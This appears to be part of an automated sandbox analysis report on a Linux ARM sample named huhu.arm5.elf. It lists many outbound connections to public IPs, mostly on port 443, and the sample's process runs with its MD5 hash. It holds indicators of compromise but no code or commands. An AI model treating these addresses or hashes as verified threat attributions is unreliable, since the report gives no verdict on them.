                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22726192.168.2.156070618.16.189.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22727192.168.2.1558980169.29.108.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22728192.168.2.1551904128.41.102.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22729192.168.2.1546098114.91.24.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22730192.168.2.1554800208.212.38.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22731192.168.2.1533458206.236.138.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22732192.168.2.155982258.216.213.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22733192.168.2.1557286109.77.245.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22734192.168.2.155506083.114.24.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22735192.168.2.155266264.243.39.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22736192.168.2.154458068.207.84.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22737192.168.2.1559568200.96.19.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22738192.168.2.154340476.175.185.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22739192.168.2.1548020135.32.181.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22740192.168.2.1551900178.156.172.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22741192.168.2.1535512186.196.141.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22742192.168.2.153776051.6.214.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22743192.168.2.1542266202.180.71.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22744192.168.2.1555154216.169.14.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22745192.168.2.1559796201.217.30.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22746192.168.2.1553766174.236.63.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22747192.168.2.1549268143.130.211.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22748192.168.2.155024675.87.73.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22749192.168.2.154809819.45.122.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22750192.168.2.1533932132.60.172.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22751192.168.2.155980832.247.32.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22752192.168.2.1560800124.236.234.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22753192.168.2.1540114148.82.207.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22754192.168.2.1534984201.174.59.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22755192.168.2.1535328141.249.107.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22756192.168.2.1555258124.235.25.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22757192.168.2.154618095.129.33.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22758192.168.2.153559446.99.27.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22759192.168.2.154916657.101.252.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22760192.168.2.154946452.12.78.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22761192.168.2.15436108.63.159.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22762192.168.2.154639473.219.128.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22763192.168.2.1551208222.244.118.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22764192.168.2.155768882.131.110.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22765192.168.2.155668881.113.164.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22766192.168.2.15329349.200.26.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22767192.168.2.155557650.212.37.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22768192.168.2.1546596102.116.105.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22769192.168.2.155400814.73.84.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22770192.168.2.153983865.147.252.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22771192.168.2.154763420.142.154.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22772192.168.2.1534248115.223.144.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22773192.168.2.1536706182.223.152.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22774192.168.2.153634279.119.57.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22775192.168.2.1556562172.193.195.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22776192.168.2.1551228107.92.76.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22777192.168.2.1559412140.161.26.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22778192.168.2.153709272.108.25.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22779192.168.2.1550126113.224.43.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22780192.168.2.1536642190.196.160.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22781192.168.2.1538098147.32.254.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22782192.168.2.1540150173.92.168.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22783192.168.2.1554432169.211.73.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22784192.168.2.154022217.238.152.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22785192.168.2.1560228174.40.133.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22786192.168.2.1555746179.167.84.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22787192.168.2.153543268.203.124.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22788192.168.2.1555792192.126.146.268080
                                            TimestampBytes transferredDirectionData


                                            System Behavior

                                            Start time (UTC):05:20:22
                                            Start date (UTC):02/02/2024
                                            Path:/tmp/huhu.arm5.elf
                                            Arguments:/tmp/huhu.arm5.elf
                                            File size:4956856 bytes
                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                            Start time (UTC):05:20:22
                                            Start date (UTC):02/02/2024
                                            Path:/tmp/huhu.arm5.elf
                                            Arguments:-
                                            File size:4956856 bytes
                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                            Start time (UTC):05:20:22
                                            Start date (UTC):02/02/2024
                                            Path:/tmp/huhu.arm5.elf
                                            Arguments:-
                                            File size:4956856 bytes
                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                            Start time (UTC):05:20:22
                                            Start date (UTC):02/02/2024
                                            Path:/tmp/huhu.arm5.elf
                                            Arguments:-
                                            File size:4956856 bytes
                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                            Start time (UTC):05:20:22
                                            Start date (UTC):02/02/2024
                                            Path:/tmp/huhu.arm5.elf
                                            Arguments:-
                                            File size:4956856 bytes
                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                            Start time (UTC):05:20:22
                                            Start date (UTC):02/02/2024
                                            Path:/tmp/huhu.arm5.elf
                                            Arguments:-
                                            File size:4956856 bytes
                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                            Start time (UTC):05:20:22
                                            Start date (UTC):02/02/2024
                                            Path:/tmp/huhu.arm5.elf
                                            Arguments:-
                                            File size:4956856 bytes
                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                            Start time (UTC):05:20:24
                                            Start date (UTC):02/02/2024
                                            Path:/usr/libexec/gnome-session-binary
                                            Arguments:-
                                            File size:334664 bytes
                                            MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                            Start time (UTC):05:20:24
                                            Start date (UTC):02/02/2024
                                            Path:/bin/sh
                                            Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                                            File size:129816 bytes
                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                            Start time (UTC):05:20:24
                                            Start date (UTC):02/02/2024
                                            Path:/usr/libexec/gsd-print-notifications
                                            Arguments:/usr/libexec/gsd-print-notifications
                                            File size:51840 bytes
                                            MD5 hash:71539698aa691718cee775d6b9450ae2

                                            Start time (UTC):05:20:25
                                            Start date (UTC):02/02/2024
                                            Path:/usr/libexec/gsd-print-notifications
                                            Arguments:-
                                            File size:51840 bytes
                                            MD5 hash:71539698aa691718cee775d6b9450ae2

                                            Start time (UTC):05:20:25
                                            Start date (UTC):02/02/2024
                                            Path:/usr/libexec/gsd-print-notifications
                                            Arguments:-
                                            File size:51840 bytes
                                            MD5 hash:71539698aa691718cee775d6b9450ae2

                                            Start time (UTC):05:20:25
                                            Start date (UTC):02/02/2024
                                            Path:/usr/libexec/gsd-printer
                                            Arguments:/usr/libexec/gsd-printer
                                            File size:31120 bytes
                                            MD5 hash:7995828cf98c315fd55f2ffb3b22384d

                                            Start time (UTC):05:20:25
                                            Start date (UTC):02/02/2024
                                            Path:/usr/sbin/gdm3
                                            Arguments:-
                                            File size:453296 bytes
                                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                            Start time (UTC):05:20:25
                                            Start date (UTC):02/02/2024
                                            Path:/etc/gdm3/PrimeOff/Default
                                            Arguments:/etc/gdm3/PrimeOff/Default
                                            File size:129816 bytes
                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                            Start time (UTC):05:20:26
                                            Start date (UTC):02/02/2024
                                            Path:/usr/sbin/gdm3
                                            Arguments:-
                                            File size:453296 bytes
                                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                            Start time (UTC):05:20:26
                                            Start date (UTC):02/02/2024
                                            Path:/etc/gdm3/PrimeOff/Default
                                            Arguments:/etc/gdm3/PrimeOff/Default
                                            File size:129816 bytes
                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                            Start time (UTC):05:20:36
                                            Start date (UTC):02/02/2024
                                            Path:/usr/lib/systemd/systemd
                                            Arguments:-
                                            File size:1620224 bytes
                                            MD5 hash:9b2bec7092a40488108543f9334aab75

                                            Start time (UTC):05:20:36
                                            Start date (UTC):02/02/2024
                                            Path:/lib/systemd/systemd-user-runtime-dir
                                            Arguments:/lib/systemd/systemd-user-runtime-dir stop 127
                                            File size:22672 bytes
                                            MD5 hash:d55f4b0847f88131dbcfb07435178e54